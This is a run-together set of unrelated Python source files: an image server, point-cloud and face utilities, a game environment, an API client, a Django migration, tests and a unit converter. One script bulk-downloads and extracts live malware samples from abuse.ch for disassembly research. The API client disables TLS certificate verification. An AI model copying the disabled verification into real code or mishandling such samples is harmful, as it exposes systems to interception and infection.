"tools.response_headers.headers": [ ("cache-control", f"max-age={60*60*24*365}, public"), ("allow", "GET"), ], }, } class LorisApp(DispatcherMixin): def __init__(self): super().__init__() cfg_dict = self._load_config_files() self._configure_logging(cfg_dict["logging"]) compliance = self._init_compliance(cfg_dict["iiif_features"]) app_configs = self._normalize_app_configs(cfg_dict["application"]) # Below is a cheat to keep us from having to pass so much static stuff # around. See requests.iiif_request.IIIFRequest and # requests.meta_request.MetaRequest to understand what's going on. 
IIIFRequest.app_configs = app_configs IIIFRequest.compliance = compliance IIIFRequest.extractors = self._init_extractors(compliance, app_configs) IIIFRequest.info_cache = SafeLruDict(size=400) IIIFRequest.resolvers = self._init_resolvers(cfg_dict["resolvers"]) IIIFRequest.transcoders = self._init_transcoders(cfg_dict["transcoders"]) @property def _package_dir(self): # pragma: no cover return path.dirname(path.realpath(__file__)) def _normalize_app_configs(self, app_configs): if app_configs["server_uri"] is not None: if app_configs["server_uri"].endswith("/"): app_configs["server_uri"] = app_configs["server_uri"][:-1] return app_configs def _load_config_files(self): # Should probably have coverage for this. Mocks? cfg_dict = {} for cfg_path in self._find_config_files(): try: cfg_dict.update(self._load_yaml_file(cfg_path)) print(f"Config file found at {cfg_path}") except FileNotFoundError: print(f"No config file found at {cfg_path}", file=stderr) return cfg_dict def _load_yaml_file(self, yaml_path): with open(yaml_path) as p: return yaml.safe_load(p) def _find_config_files(self): # TODO: https://github.com/jpstroop/loris-redux/issues/44 # returns paths to the config files in order of preference paths = [] paths.append(path.join(self._package_dir, "config.yaml")) paths.append("/etc/loris/config.yaml") paths.append(path.expanduser("~/.loris/config.yaml")) return paths def _configure_logging(self, cfg_dict): # pragma: no cover global logger logging.config.dictConfig(cfg_dict) logger = logging.getLogger("loris") logger.debug("Logging configured") def _init_compliance(self, cfg_dict): compliance = Compliance(cfg_dict) msg = f"Compliance is level {int(compliance)}" logger.info(msg) return compliance def _init_extractors(self, compliance, app_configs): pillow_extractor = PillowExtractor(compliance, app_configs) jp2_extractor = Jp2Extractor(compliance, app_configs) return { "jpg": pillow_extractor, "png": pillow_extractor, "tif": pillow_extractor, "jp2": jp2_extractor, } def _init_resolvers(self, resolver_list, include_example=True): resolvers = Resolvers(resolver_list) # add a resolver that resolves to the root of the package for viewing # sample files if include_example: description = """\ This is a sample resolver to test that the server is working. 
Using \ `loris:sample.jp2` as an identifier should return a test image.\ """ cfg = {"root": self._package_dir, "description": description} klass = "loris.resolvers.file_system_resolver.FileSystemResolver" resolvers.add_resolver(klass, "loris", cfg) return resolvers def _init_transcoders(self, transcoder_list): transcoders = {} for entry in transcoder_list: name = entry.pop("class") Klass = import_class(name) src_fmt = entry.pop("src_format") transcoders[src_fmt] = Klass(entry) msg = f"Initialized transcoders[{src_fmt}] with {name}" logger.info(msg) return transcoders laughtervv/SGPN import argparse import tensorflow as tf import os os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152 import provider from utils.test_utils import * from models import model parser = argparse.ArgumentParser() parser.add_argument('--gpu', type=str, default="1", help='GPU to use [default: GPU 1]') parser.add_argument('--verbose', action='store_true', help='if specified, use depthconv') parser.add_argument('--input_list', type=str, default='/media/hdd2/data/pointnet/stanfordindoor/valid_hdf5_file_list.txt', help='Validation data list') parser.add_argument('--restore_dir', type=str, default='checkpoint/stanford_ins_seg_groupmask11_fromgroup_recipweight_nopow2_lr4', help='Directory that stores all training logs and trained models') FLAGS = parser.parse_args() PRETRAINED_MODEL_PATH = os.path.join(FLAGS.restore_dir,'trained_models/') gpu_to_use = 0 os.environ["CUDA_VISIBLE_DEVICES"] = FLAGS.gpu RESTORE_DIR = FLAGS.restore_dir OUTPUT_DIR = os.path.join(FLAGS.restore_dir, 'valid_results') if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR) OUTPUT_VERBOSE = FLAGS.verbose # If true, output similarity # MAIN SCRIPT POINT_NUM = 4096 # the max number of points in the all testing data shapes BATCH_SIZE = 1 NUM_GROUPS = 50 NUM_CATEGORY = 13 TESTING_FILE_LISTFILE = FLAGS.input_list test_file_list = provider.getDataFiles(TESTING_FILE_LISTFILE) len_pts_files = len(test_file_list) def printout(flog, data): print(data) flog.write(data + '\n') def predict(): is_training = False with tf.device('/gpu:' + str(gpu_to_use)): is_training_ph = tf.placeholder(tf.bool, shape=()) pointclouds_ph, ptsseglabel_ph, ptsgroup_label_ph, _, _, _ = \ model.placeholder_inputs(BATCH_SIZE, POINT_NUM, NUM_GROUPS, NUM_CATEGORY) group_mat_label = tf.matmul(ptsgroup_label_ph, tf.transpose(ptsgroup_label_ph, perm=[0, 2, 1])) net_output = model.get_model(pointclouds_ph, is_training_ph, group_cate_num=NUM_CATEGORY) # Add ops to save and restore all the variables. saver = tf.train.Saver() config = tf.ConfigProto() config.gpu_options.allow_growth = True config.allow_soft_placement = True with tf.Session(config=config) as sess: # Restore variables from disk. 
ckptstate = tf.train.get_checkpoint_state(PRETRAINED_MODEL_PATH) if ckptstate is not None: LOAD_MODEL_FILE = os.path.join(PRETRAINED_MODEL_PATH,os.path.basename(ckptstate.model_checkpoint_path)) saver.restore(sess, LOAD_MODEL_FILE) print ("Model loaded in file: %s" % LOAD_MODEL_FILE) else: print ("Fail to load modelfile: %s" % PRETRAINED_MODEL_PATH) ths = np.zeros(NUM_CATEGORY) ths_ = np.zeros(NUM_CATEGORY) cnt = np.zeros(NUM_CATEGORY) min_groupsize = np.zeros(NUM_CATEGORY) min_groupsize_cnt = np.zeros(NUM_CATEGORY) for shape_idx in range(len_pts_files): cur_train_filename = test_file_list[shape_idx] if not os.path.exists(cur_train_filename): continue cur_data, cur_group, _, cur_seg = provider.loadDataFile_with_groupseglabel_stanfordindoor(cur_train_filename) if OUTPUT_VERBOSE: pts = np.reshape(cur_data, [-1,9]) output_point_cloud_rgb(pts[:, 6:], pts[:, 3:6], os.path.join(OUTPUT_DIR, '%d_pts.obj' % (shape_idx))) pts_label_one_hot, pts_label_mask = model.convert_seg_to_one_hot(cur_seg) pts_group_label, _ = model.convert_groupandcate_to_one_hot(cur_group) num_data = cur_data.shape[0] cur_seg_flatten = np.reshape(cur_seg, [-1]) un, indices = np.unique(cur_group, return_index=True) for iu, u in enumerate(un): groupsize = np.sum(cur_group == u) groupcate = cur_seg_flatten[indices[iu]] min_groupsize[groupcate] += groupsize # print groupsize, min_groupsize[groupcate]/min_groupsize_cnt[groupcate] min_groupsize_cnt[groupcate] += 1 for j in range(num_data): print ("Processsing: Shape [%d] Block[%d]"%(shape_idx, j)) pts = cur_data[j,...] feed_dict = { pointclouds_ph: np.expand_dims(pts,0), ptsseglabel_ph: np.expand_dims(pts_label_one_hot[j,...],0), ptsgroup_label_ph: np.expand_dims(pts_group_label[j,...],0), is_training_ph: is_training, } pts_corr_val0, pred_confidence_val0, ptsclassification_val0, pts_corr_label_val0 = \ sess.run([net_output['simmat'], net_output['conf'], net_output['semseg'], group_mat_label], feed_dict=feed_dict) seg = cur_seg[j,...] ins = cur_group[j,...] 
pts_corr_val = np.squeeze(pts_corr_val0[0]) pred_confidence_val = np.squeeze(pred_confidence_val0[0]) ptsclassification_val = np.argmax(np.squeeze(ptsclassification_val0[0]),axis=1) pts_corr_label_val = np.squeeze(1 - pts_corr_label_val0) seg = np.squeeze(seg) ins = np.squeeze(ins) ind = (seg == 8) pts_corr_val0 = (pts_corr_val > 1.).astype(np.float) print np.mean(np.transpose(np.abs(pts_corr_label_val[ind] - pts_corr_val0[ind]),axes=[1,0])[ind]) ths, ths_, cnt = Get_Ths(pts_corr_val, seg, ins, ths, ths_, cnt) print ths/cnt if OUTPUT_VERBOSE: un,indices = np.unique(ins,return_index=True) for ii,id in enumerate(indices): corr = pts_corr_val[id].copy() output_scale_point_cloud(pts[:,6:], np.float32(corr), os.path.join(OUTPUT_DIR, '%d_%d_%d_%d_scale.obj'%(shape_idx,j,un[ii],seg[id]))) corr = pts_corr_label_val[id] output_scale_point_cloud(pts[:, 6:], np.float32(corr), os.path.join(OUTPUT_DIR, '%d_%d_%d_%d_scalegt.obj' % (shape_idx, j, un[ii],seg[id]))) output_scale_point_cloud(pts[:, 6:], np.float32(pred_confidence_val), os.path.join(OUTPUT_DIR, '%d_%d_conf.obj' % (shape_idx, j))) output_color_point_cloud(pts[:,6:], ptsclassification_val.astype(np.int32), os.path.join(OUTPUT_DIR, '%d_seg.obj'%(shape_idx))) ths = [ths[i]/cnt[i] if cnt[i] != 0 else 0.2 for i in range(len(cnt))] np.savetxt(os.path.join(RESTORE_DIR, 'pergroup_thres.txt'), ths) min_groupsize = [int(float(min_groupsize[i]) / min_groupsize_cnt[i]) if min_groupsize_cnt[i] != 0 else 0 for i in range(len(min_groupsize))] np.savetxt(os.path.join(RESTORE_DIR, 'mingroupsize.txt'), min_groupsize) with tf.Graph().as_default(): predict() utils.py import dlib import numpy as np def orthogonal_projections(matrix, u, vh): return np.diag(u.T @ matrix @ vh.T) def svd(image): u, s, vh = np.linalg.svd(image, full_matrices=True) return {'u': u, 's': s, 'vh': vh} def crop(image, x, y, w, h): return image[y:y + h, x:x + w] # def crop_dlib(image, x, y, w, h): # left = x # top = y # right = x + w # bottom = y + h # rect = dlib.rectangle(left, top, right, bottom) # return dlib.get_face_chip(image, rect) def _face_id_generator_func(): face_id = 1 while True: yield f"{face_id}" face_id += 1 def _tmp_face_id_generator_func(): face_id = 1 while True: yield f"tmp:{face_id}" face_id += 1 _face_id_generator = _face_id_generator_func() _tmp_face_id_generator = _tmp_face_id_generator_func() def generate_tmp_face_id(): return next(_tmp_face_id_generator) def generate_face_id(): return next(_face_id_generator) def is_tmp_id(face_id): return face_id.split(':')[0] == "tmp" def box_area(box): return box[2] * box[3] def bb_intersection_over_union(boxA, boxB): # determine the (x, y)-coordinates of the intersection rectangle xA = max(boxA[0], boxB[0]) yA = max(boxA[1], boxB[1]) xB = min(boxA[0] + boxA[2], boxB[0] + boxB[2]) yB = min(boxA[1] + boxA[3], boxB[1] + boxB[3]) # compute the area of intersection rectangle interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1) # compute the area of both the prediction and ground-truth # rectangles boxAArea = (boxA[2] + 1) * (boxA[3] + 1) boxBArea = (boxB[2] + 1) * (boxB[3] + 1) # compute the intersection over union by taking the intersection # area and dividing it by the sum of prediction + ground-truth # areas - the interesection area iou = interArea / float(boxAArea + boxBArea - interArea) # return the intersection over union value return iou def match_box(face_box, face_boxes, threshold=0.3): if not face_boxes: return False, 0 max_iou = 0 best_face_id = -1 for _face_id, _face_box in enumerate(face_boxes): iou = 
bb_intersection_over_union(face_box, _face_box) if iou > max_iou: max_iou = iou best_face_id = _face_id matched_ok = max_iou >= threshold return matched_ok, best_face_id def to_int_cords(face_box): return tuple([int(cord) for cord in face_box]) def euc_dist(vec1, vec2, p=2, weights=1): return np.linalg.norm(weights*(vec1 - vec2), p) def cos_dist(vec1, vec2): return np.dot(vec1, vec2)/(np.linalg.norm(vec1) * np.linalg.norm(vec2)) KivenCkl/LeetCodeProblemset/shuffle-an-array/shuffle-an-array.py1-10 # @Title: 打乱数组 (Shuffle an Array) # @Author: KivenC # @Date: 2019-03-13 11:54:48 # @Runtime: 732 ms # @Memory: 19.2 MB class Solution: def __init__(self, nums: List[int]): self.nums = nums def reset(self) -> List[int]: """ Resets the array to its original configuration and return it. """ return self.nums def shuffle(self) -> List[int]: """ Returns a random shuffling of the array. """ import random return random.sample(self.nums, len(self.nums)) # Your Solution object will be instantiated and called as such: # obj = Solution(nums) # param_1 = obj.reset() # param_2 = obj.shuffle() simpleland/env.py from simpleland.registry import load_game_content, GameDef import gym from gym import spaces import logging from simpleland.runner import get_game_def, get_player_def, UDPHandler, GameUDPServer from simpleland.event import InputEvent import threading from simpleland.player import Player from simpleland.renderer import Renderer from simpleland.utils import gen_id from simpleland.core import gamectx from simpleland.client import GameClient from simpleland.registry import load_game_def, load_game_content import time from typing import Dict, Any # AGENT_KEYMAP = [0,17,5,23,19,1,4] import numpy as np from simpleland.utils import merged_dict from pyinstrument import Profiler keymap = [23,1,4] class SimpleLandEnv: def __init__(self, resolution=(200,200), game_id="space_ship1", hostname = 'localhost', port = 10001, dry_run=False, agent_map={}, physics_tick_rate = 0, game_tick_rate = 0, sim_timestep = 0.01, enable_server = True, view_type=0, render_shapes=True, player_type = 1, content_config = {}): game_def = get_game_def( game_id=game_id, enable_server=enable_server, port=port, remote_client=False, physics_tick_rate=physics_tick_rate, game_tick_rate = game_tick_rate, sim_timestep=sim_timestep) game_def.content_config = merged_dict(game_def.content_config,content_config) self.content = load_game_content(game_def) gamectx.initialize( game_def = game_def, content=self.content) # Build Clients self.agent_map = agent_map self.agent_clients = {} player_def = None for agent_id, agent_info in agent_map.items(): player_def = get_player_def( enable_client=True, client_id = agent_id, remote_client=False, hostname=hostname, port = port, resolution = resolution,#agent_info['resolution'], fps=game_tick_rate, render_shapes=render_shapes, player_type=player_type, is_human=False, view_type=view_type) # Render config changes player_def.renderer_config.sdl_audio_driver = 'dsp' player_def.renderer_config.render_to_screen = True # self.config_manager.renderer_config.sdl_video_driver = 'dummy' player_def.renderer_config.sound_enabled = False player_def.renderer_config.show_console = False renderer = Renderer( player_def.renderer_config, asset_bundle=self.content.get_asset_bundle() ) client = GameClient( renderer=renderer, config=player_def.client_config) gamectx.add_local_client(client) self.agent_clients[agent_id]=client self.dry_run = dry_run self.action_space = spaces.Discrete(len(keymap)) # self.observation_space = spaces.Box(0, 
255, (resolution[0], resolution[1],3)) self.observation_space = self.content.get_observation_space() logging.info("Ob space: {}".format(self.observation_space)) self.action_freq = 1 self.step_counter = 0 self.ob = None self.safe_mode = True self.running = True self.server=None self.dry_run_sample = self.observation_space.sample() if game_def.server_config.enabled: self.server = GameUDPServer( conn = (game_def.server_config.hostname, game_def.server_config.port), handler=UDPHandler, config = game_def.server_config) server_thread = threading.Thread(target=self.server.serve_forever) server_thread.daemon = True server_thread.start() print("Server started at {} port {}".format(game_def.server_config.hostname, game_def.server_config.port)) def step(self, actions): # get actions from agents if self.step_counter % self.action_freq == 0: for agent_id, action in actions.items(): client:GameClient = self.agent_clients[agent_id] if self.dry_run: return self.dry_run_sample, 1, False, None if client.player is not None: event = InputEvent( player_id = client.player.get_id(), input_data = { 'inputs':[keymap[action]], 'mouse_pos': "", 'mouse_rel': "", 'focused': "" }) client.player.add_event(event) client.run_step() gamectx.run_step() obs = {} dones = {} rewards = {} infos ={} if self.step_counter % self.action_freq ==0: for agent_id,client in self.agent_clients.items(): # ob = client.get_observation(type="sensor") ob, reward, done, info = client.content.get_step_info(player= client.player) obs[agent_id] = ob dones[agent_id] = done rewards[agent_id] = reward infos[agent_id] = info self.step_counter +=1 return obs,rewards,dones,infos def render(self, mode=None): if self.dry_run: return self.observation_space.sample() # TODO: add rendering for observer window for agent_id,client in self.agent_clients.items(): client.render(force=True) return client.get_rgb_array() def reset(self) -> Dict[str,Any]: # self.content.load(gamectx) self.obs, _, _, _ = self.step({}) return self.obs def close(self): if self.server is not None: self.server.shutdown() self.server.server_close() class SimpleLandEnvSingle(gym.Env): def __init__(self, frame_skip=0, content_config={}, render_shapes=True, player_type=1, view_type=1, game_tick_rate=10000): print("Starting SL v21") self.agent_id = "1" self.env_main = SimpleLandEnv( agent_map={self.agent_id:{}}, enable_server=False, game_tick_rate=game_tick_rate, content_config=content_config, view_type=view_type, player_type=player_type, render_shapes=render_shapes) self.observation_space = self.env_main.observation_space self.action_space = self.env_main.action_space self.frame_skip = frame_skip def reset(self): obs = self.env_main.reset() return obs.get(self.agent_id) def step(self,action): total_reward = 0 ob = None done = False info = {} i = 0 reward_list = [] ready = False while not ready: obs,rewards,dones,infos = self.env_main.step({self.agent_id:action}) ob, reward, done, info = obs[self.agent_id],rewards[self.agent_id],dones[self.agent_id],infos[self.agent_id] # TODO: check for obs mode render use image as obs space total_reward +=reward reward_list.append(reward) if done: ready = True # if done found, exit loop elif ob is None: # if ob is missing, retry time.sleep(0.01) continue elif i >= self.frame_skip: # if frames skipped reached, exit loop ready = True i +=1 return ob, max(reward_list), done, info def close(self): self.env_main.close() def render(self,mode=None): return self.env_main.render(mode=mode) if __name__ == "__main__": agent_map = {str(i):{} for i in range(1)} env = 
SimpleLandEnv(agent_map=agent_map,dry_run=False) env.reset() done_agents = set() start_time = time.time() max_steps = 100000 profiler = Profiler() profiler.start() for i in range(0,max_steps): actions = {agent_id:env.action_space.sample() for agent_id in agent_map.keys()} obs, rewards, dones, infos = env.step(actions) steps_per_sec = max_steps/(time.time()-start_time) print(f"steps_per_sec {steps_per_sec}") profiler.stop() print(profiler.output_text(unicode=True, color=True)) 1-10 # # Common HTTP methods # import requests import json from .exceptions import EdmApiClientError, EdmApiServerError PREFIX = '/api/' HTTPS = 'https://' ERR_STR = 'EDM API Call failed with status {status_code}: {body}' class Rest(object): """ Class with methods to make the api calls """ def __init__(self, host, apitoken, api_version, raise_on_error=False): self.host = host self.apitoken = apitoken self.apiversion = api_version self.raise_on_error = raise_on_error self._headers = { 'X-Arbux-APIToken': self.apitoken, } @staticmethod def _format_response(response): """ Return a dict containing body, status code and headers of the response """ # If content is not json then it is # probably an error. So return try: # Decoding from UTF-8 is necessary for Python versions below 3.6 # https://docs.python.org/3/whatsnew/3.6.html#json body = json.loads(response.content if type(response.content) == str else response.content.decode('utf-8')) except ValueError: body = {'error': response.reason} formated = { 'body': body, 'status_code': response.status_code, 'headers': response.headers } return formated @staticmethod def _raise_on_error(response): """ Raise an exception if the response contains an unsuccessful status code """ if 400 <= response['status_code'] < 500: raise EdmApiClientError(ERR_STR.format( status_code=response['status_code'], body=response['body'])) elif 500 <= response['status_code'] < 600: raise EdmApiServerError(ERR_STR.format( status_code=response['status_code'], body=response['body'])) def _make_request(self, rest_method, item=None, **kwargs): """ Make requests """ s = requests.Session() url = HTTPS + self.host + PREFIX + self.apiversion \ + self.base_url url = url + (item if item else '') req = requests.Request(rest_method, url, headers=self._headers, **kwargs) prepped = s.prepare_request(req) if rest_method in ['POST', 'PUT', 'PATCH']: prepped.headers['Content-Type'] = 'application/json' response = self._format_response(s.send(prepped, verify=False)) if self.raise_on_error: self._raise_on_error(response) return response def _post(self, **kwargs): """ REST POST method """ return self._make_request('POST', data=json.dumps(kwargs)) def _get(self, **kwargs): """ REST GET method """ item = '/' + str(kwargs.pop('item')) if 'item' in kwargs and \ kwargs['item'] else '' return self._make_request('GET', item=item, params=kwargs) def _delete(self, item=None): """ REST DELETE method """ item = '/' + str(item) if item else '' return self._make_request('DELETE', item=item) def _patch(self, item=None, **kwargs): """ REST PATCH method """ item = '/' + str(item) if item else '' return self._make_request('PATCH', item=item, data=json.dumps(kwargs)) def _put(self, item=None, **kwargs): """ REST PUT method """ item = '/' + str(item) if item else '' return self._make_request('PUT', item=item, data=json.dumps(kwargs)) L1NNA/JARV1S-Disassembler from pathlib import Path import os import requests from lxml import html from tqdm import tqdm import urllib.request as ur from zipfile import ZipFile from jvd.utils import grep_ext, 
download_file from jvd.ida.ida import IDA import sys import io from csv import reader as csv_reader from jvd.resources import ResourceAbstract from jvd import process_folder from jvd.utils import download_file, JVSample, read_gz_js, write_gz_js from shutil import rmtree from jvd.labelers import label files = "https://mb-api.abuse.ch/downloads/" url_csv = 'https://bazaar.abuse.ch/export/csv/full/' def _download_all(data_path): cache = os.path.join(data_path, 'progress.json.gz') if not os.path.exists(cache): write_gz_js({'done': []}, cache) done = set(read_gz_js(cache)['done']) page = requests.get(files) webpage = html.fromstring(page.content) links = webpage.xpath('//a/@href') links = [(os.path.join(data_path, l), files+l, l) for l in links if l.startswith(('2020', '2021'))] for l in tqdm(links): try: # _process_entry(l, data_path, done) file, link, name = l print() print('processing', file, name) if not os.path.exists(file): download_file(link, file, True) ext = str(Path(file).with_suffix('')) + '_extracted' ext = os.path.abspath(ext) if not os.path.exists(ext) and os.path.basename(ext) not in done: with ZipFile(file) as zf: zf.extractall(ext, pwd=b'infected') process_folder(ext, capa=True, unpack=True, disassemble=False) _merge_all(data_path) done.add(os.path.basename(ext)) write_gz_js({'done': list(done)}, cache) except Exception as e: print(e) print(l) continue _merge_all(data_path) def _merge_all(path, out_dir='_all_staging'): folders = [os.path.join(path, p) for p in os.listdir(path)] folders = [f for f in folders if os.path.isdir( f) and not os.path.basename(f).startswith('_all')] print(folders) for f in tqdm(folders): bins = Path(f).rglob('*.bin') for b in tqdm(bins): b: Path sample = JVSample(str(b)) # label(sample) # continue family = '-'.join( sorted([l for l in sample.labels if not l.startswith('_vt')])) if family == 'na': dest = os.path.join(path, out_dir, 'unknown') else: dest = os.path.join(path, out_dir, sample.file_type.split()[0].lower(), sample.file_type.split()[0].lower() + '.' 
+ family) if not os.path.exists(dest): os.makedirs(dest) target = os.path.join(dest, b.name) if not os.path.exists(target): os.rename(str(b), target) if __name__ == '__main__': data_path = 'I:/MalBinZoo/ftp' # _download_all(data_path) _merge_all(data_path) pass # label_folder('I:/MalBinZoo/2020-06-29_extracted') food_toolbox/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-03-28 15:39 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Ingredients_List', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=100)), ], ), migrations.CreateModel( name='Recipe', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title_text', models.CharField(max_length=200)), ('last_modified_date', models.DateField(verbose_name=b'last modified')), ('process_description', models.TextField()), ('cooking_temperature_celsius', models.IntegerField(blank=True)), ('preparation_time_minutes', models.IntegerField(blank=True)), ('presentation_image_link', models.URLField(blank=True, null=True)), ], ), migrations.CreateModel( name='Recipe_Ingredient', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('ingredient_quantity', models.CharField(blank=True, max_length=100, null=True)), ('ingredient_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='food_toolbox.Ingredients_List')), ('recipe', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='food_toolbox.Recipe')), ], ), ] fperez/regregcode/tests/test_graphroot.py import numpy as np import pylab, time, scipy import scipy.sparse import regreg.regression as regreg import regreg.lasso as lasso import regreg.graphroot as graphroot import regreg.signal_approximator as glasso from tests import gen_adj from regreg import mask import nose.tools control = {'max_its':5500, 'tol':1.0e-8, 'plot':False, 'backtrack':True} def test_graphroot(X=None,Y=None,l1=5.,l2=10., control=control, mu=1.): if X is None or Y is None: X = np.load('X.npy') Y = np.load('Y.npy') p = X.shape[1] adj, L = gen_adj(p) Dsparse = mask.create_D(adj) D = Dsparse.toarray() Lsparse = scipy.sparse.lil_matrix(L) l1 *= X.shape[0] p1 = graphroot.gengrad((X, Y, D)) p1.assign_penalty(l1=l1,l2=l2,mu=mu) t1 = time.time() opt1 = regreg.FISTA(p1) opt1.fit(tol=control['tol'], max_its=control['max_its']) beta1 = opt1.problem.coefs t2 = time.time() ts1 = t2-t1 p2 = graphroot.gengrad_sparse((X, Y, Dsparse)) p2.assign_penalty(l1=l1,l2=l2,mu=mu) t1 = time.time() opt2 = regreg.FISTA(p2) opt2.fit(tol=control['tol'], max_its=control['max_its']) beta2 = opt2.problem.coefs t2 = time.time() ts2 = t2-t1 def f(beta): return np.linalg.norm(Y - np.dot(X, beta))**2/(2) + np.fabs(beta).sum()*l1 + l2 * np.sqrt(np.dot(beta, np.dot(L, beta))) v = scipy.optimize.fmin_powell(f, np.zeros(X.shape[1]), ftol=1.0e-10, xtol=1.0e-10,maxfun=100000) v = np.asarray(v) vs = scipy.optimize.fmin_powell(p1.obj, np.zeros(X.shape[1]), ftol=1.0e-10, xtol=1.0e-10,maxfun=100000) vs = np.asarray(vs) print np.round(1000*beta1)/1000 print np.round(1000*beta2)/1000 print np.round(1000*vs)/1000 print np.round(1000*v)/1000 print p1.obj(beta1), p1.obj(vs), f(beta1), f(v) print ts1, ts2 NOAA-ORR-ERD/PyNUCOS 
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Unit conversion calculators. CHANGELOG: 2005/07/14 CB: Initial import. 2005/07/15 MO: Latitude and Longitude classes. 2005/07/18 MO: Limit Latitude range to 90. 2007/05/03 CB: Tweaked lat-long to get correct answer for 40 minutes. Added "convert" as alias for "Convert" 2007/12/17 MO: Add .format() method to Latitude/Longitude returning Unicode. .factor_html() remains for backward compatibility, using .format() internally. Make Latitude/Longitude.__repr__ more robust in case .__init__ raises an exception; workaround for Pylons bug http://pylonshq.com/project/pylonshq/ticket/341 2008/02/22 CB: Added a few more units for Ian 2008/06/05 CB: Various changes before putting the Converter GUI on the web: new units, changed spelling, etc. 2009/09/29 CB: Re-factored the lat-long stuff: - it's not in a separate module - Mike and Chris' code has been merged for less duplication - Unit data moved to separate module 2018/01/24 CB: Added unicode exponents in unit names Added __all__ Fixed concentration in water units! """ import warnings from .unit_data import ConvertDataUnits from nucos import lat_long from .lat_long import (LatLongConverter, Latitude, Longitude, format_lat, format_lon, format_lat_d, format_lon_d, format_lat_dm, format_lon_dm, format_lat_dms, format_lon_dms, ) __all__ = ['DensityConverterClass', 'InvalidUnitTypeError', 'Latitude', 'ConverterClass', 'is_supported', 'Converters', 'GetUnitNames', 'NotSupportedUnitError', 'UNIT_TYPES', 'TempConverterClass', 'Simplify', 'GetUnitAbbreviation', 'Convert', 'FindUnitTypes', 'lat_long', 'LatLongConverter', 'Longitude', 'ConvertDataUnits', 'InvalidUnitError', 'is_same_unit', 'GetUnitTypes', 'OilQuantityConverter', 'convert', 'UnitConversionError', 'format_lat', 'format_lon', 'format_lat_dms', 'format_lon_dms', ] # A few utilities def Simplify(string): """ Simplify(string) returns the string with the whitespace and capitalization removed """ try: return "".join(string.lower().split()).replace(".", "") except AttributeError: raise NotSupportedUnitError(string) def GetUnitTypes(): """ returns a list of all the unit types available a unit type is something like "mass", "velocity", etc. """ return list(ConvertDataUnits.keys()) def GetUnitNames(UnitType): """ returns a list of all the units available for a given unit type available a unit type is something like "Mass", "Velocity", etc. a unit of mass would be "kilogram", "slug", etc. """ UnitType.capitalize() return list(ConvertDataUnits[UnitType].keys()) def FindUnitTypes(): """ returns a mapping of all the unit names to the unit types raises an exception if there is more than one option -- this will check the unit database for duplicated names Usually not called from user code. """ unit_types = {} for unit_type, unit_data in ConvertDataUnits.items(): unit_type = Simplify(unit_type) # - skipping Oil Concentration, 'cause this is really length # - lots of duplicate units! # - skipping Concentration in water, 'cause it's weird # - mass/volume and mass/mass ! # - skipping Mass Fraction, because there are lots of duplicate units # that conflict with Concentration & Concentration In Water. 
if unit_type in ('oilconcentration', 'concentrationinwater', 'massfraction', 'volumefraction', 'deltatemperature', 'dimensionless', ): continue for pname, data in unit_data.items(): # strip out whitespace and capitalization pname = Simplify(pname) # add the primary name: unit_types[pname] = unit_type # now the synonyms: for n in data[1]: n = Simplify(n) # skip duplicate units, "oz" is only mass, "s" is only time if (unit_type, n) in [("volume", "oz"), ("density", "s")]: continue if n in unit_types: raise ValueError("Duplicate name in units table: %s" % n) unit_types[n] = unit_type return unit_types UNIT_TYPES = FindUnitTypes() def GetUnitAbbreviation(unit_type, unit): """ return the standard abbreviation for a given unit :param unit_type: the type of unit: "mass", "length", etc. :param unit: the unit you want the abbreviation for: "gram", etc. """ return ConvertDataUnits[unit_type][unit][1][0] def is_same_unit(unit1, unit2): """ Checks if the two unit names passed in are the same :param unit1: name of unit to compare :type unit1: string :param unit2: name of unit to compare :type unit2: string :returns: True if they are synonyms for the same unit. False if they are different units. False if one of them is not in the database. """ all_types = UNIT_TYPES unit1 = Simplify(unit1) unit2 = Simplify(unit2) try: type1 = all_types[unit1] type2 = all_types[unit2] except KeyError: return False if type1 != type2: return False else: Synonyms = Converters[Simplify(type1)].Synonyms return Synonyms[Simplify(unit1)] == Synonyms[Simplify(unit2)] class ConverterClass: """ Main class for performing the conversion. There will be one instance for each unit type. sub-classes will handle special cases """ def __init__(self, TypeName, UnitsDict): """ Create a Converter :param TypeName: the name of the unit type, such as "length" :param UnitsDict: A dict will the unit data. See unit_data.py for format """ self.Name = TypeName self.Synonyms = {} self.Convertdata = {} for PrimaryName, data in UnitsDict.items(): # strip out whitespace and capitalization Pname = Simplify(PrimaryName) self.Convertdata[Pname] = data[0] self.Synonyms[Pname] = Pname for synonym in data[1]: # duplicate check if synonym in self.Synonyms: raise ValueError("Duplicate synonym: " "unit_type: {}, name: {}".format(TypeName, synonym) ) self.Synonyms[Simplify(synonym)] = Pname def Convert(self, FromUnit, ToUnit, Value): """ Convert(FromUnit, ToUnit, Value) returns a new value, in the units of ToUnit. :param FromUnit: the unit the original value is in :param ToUnit: the unit you want the value converted to :param Value: the original value """ FromUnit = Simplify(FromUnit) ToUnit = Simplify(ToUnit) try: FromUnit = self.Synonyms[FromUnit] except KeyError: raise InvalidUnitError((FromUnit, self.Name)) try: ToUnit = self.Synonyms[ToUnit] except KeyError: raise InvalidUnitError((ToUnit, self.Name)) return Value * self.Convertdata[FromUnit] / self.Convertdata[ToUnit] # the special case classes: class TempConverterClass(ConverterClass): """ Special case class for temperature conversion. handles the zero-offset shift for K, C, F... """ def Convert(self, FromUnit, ToUnit, Value): """ Convert(FromUnit, ToUnit, Value) returns a new value, in the units of ToUnit. 
